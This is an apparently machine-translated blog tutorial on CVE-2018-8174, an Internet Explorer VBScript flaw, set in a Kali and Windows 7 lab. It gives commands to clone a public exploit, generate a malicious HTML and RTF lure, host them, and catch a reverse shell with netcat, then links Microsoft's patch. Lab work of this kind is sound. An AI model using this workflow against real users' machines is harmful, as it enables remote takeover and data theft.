CVE-2018-8174 vulnerability exploitation and vulnerability reinforcement

Others 2021-01-25 21:19:50 views: null

table of Contents

Vulnerability description

  A remote code execution vulnerability exists in the way the VBScript engine handles objects in memory. The vulnerability may corrupt memory in a way that an attacker can execute arbitrary code in the context of the current user. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. If the current user logs in with administrative user rights, an attacker who successfully exploited this vulnerability could take control of the affected system. Then, the attacker might install the program. View, change or delete data; or create a new account with full user rights.

  In a web-based attack scenario, the attacker may have a specially crafted website designed to exploit this vulnerability through Internet Explorer, and then trick users into viewing the website. The attacker may also embed ActiveX controls marked as "initialization safe" in applications or Microsoft Office documents that host the IE rendering engine. The attacker may also use infected websites and websites that accept or host user-provided content or advertisements. These websites may contain specially crafted content that can exploit this vulnerability.


Impact version

  • Windows 7
  • Windows Server 2012 R2
  • Windows RT 8.1
  • Windows Server 2008
  • Windows Server 2012
  • Windows 8.1
  • Windows Server 2016
  • Windows Server 2008 R2
  • Windows 10
  • Windows 10 server.

Vulnerability detection

https://github.com/clark515/CVE_PoC/

After downloading the file, copy the html file to our web server or the target machine.

When a system with a CVE-2018-8174 vulnerability uses IE to access the htm file, a calculator will pop up.

Insert picture description here

Exploit

Attack machine: kali
target machine: windows 7

Download the script to kali

git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git

Enter the file and generate just a script:

cd CVE-2018-8174_EXP/
python CVE-2018-8174.py -u http://192.168.206.128/exploit.html -o exp.rtf -i 192.168.206.128 -p 4444
  • -u: URL address, malicious html file
  • -o: Generate documentation
  • -i: listening address
  • -p: listening port
    Insert picture description here

Copy the html file to the website directory

cp exploit.html /var/www/html/
cp exp.rtf /var/www/html/

Open apache2 service

service apache2 start

Use nc for port monitoring

nc -lvvp 4444

When the target uses the ie browser to access the html file we constructed, it can obtain the shell permission

http://192.168.206.128/exploit.html

Insert picture description here

Attack machine nc monitoring online:
Insert picture description here

Bug fix

Patch address:
https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8174

Select the corresponding system version, for example, I am a 32-bit windows 7 system
Insert picture description here
Insert picture description here
Insert picture description here

Run it directly after downloading

Reference address

https://www.freebuf.com/vuls/224379.html

Guess you like

Origin blog.csdn.net/weixin_41924764/article/details/109254685
Recommended
Ranking
error: (-215:Assertion failed) !_img.empty() in function ‘cv::imwrite‘
Database migration between Navicat servers
Minimum number of rotation of the array: Array
balenaEtcher for mac (make a boot disk software) v1.5.67
Custom processing serialization and deserialization in jackson
Mu-en-mask system development software
Mastering Regular Expressions
Find mileage Java--
Web pages can not directly concern the public micro-channel number how to do? A key to arouse public concern number of micro-channel solutions
[CodeForces - 739B] Alyona and a tree Tree + [difference] + bipartite
Daily
More
2024-05-12(28)
2024-05-11(32)
2024-05-10(34)
2024-05-09(32)
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)

Code World

© 2018 codetd.com